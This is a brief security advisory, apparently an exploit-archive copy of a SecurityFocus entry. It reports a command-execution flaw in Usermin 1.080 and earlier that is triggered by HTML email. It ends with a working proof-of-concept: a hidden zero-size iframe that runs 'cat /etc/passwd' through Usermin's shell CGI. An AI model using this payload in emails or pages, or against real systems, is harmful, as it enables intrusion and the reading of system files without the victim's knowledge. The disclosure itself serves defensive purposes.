8 lines
No EOL
500 B
Text
8 lines
No EOL
500 B
Text
source: http://www.securityfocus.com/bid/11122/info
|
|
|
|
Webmin / Usermin are reportedly affected by a command execution vulnerability when rendering HTML email messages. This issue is due to a failure to sanitize HTML email messages and may allow an attacker to execute arbitrary commands on a vulnerable computer.
|
|
|
|
This issue is reported to affect Usermin versions 1.080 and prior.
|
|
|
|
<iframe src='/shell/index.cgi?cmd=cat+%2Fetc%2Fpasswd&pwd=%2Fhome%2Fv
|
|
ictim&history=' height=0 width=0></iframe> |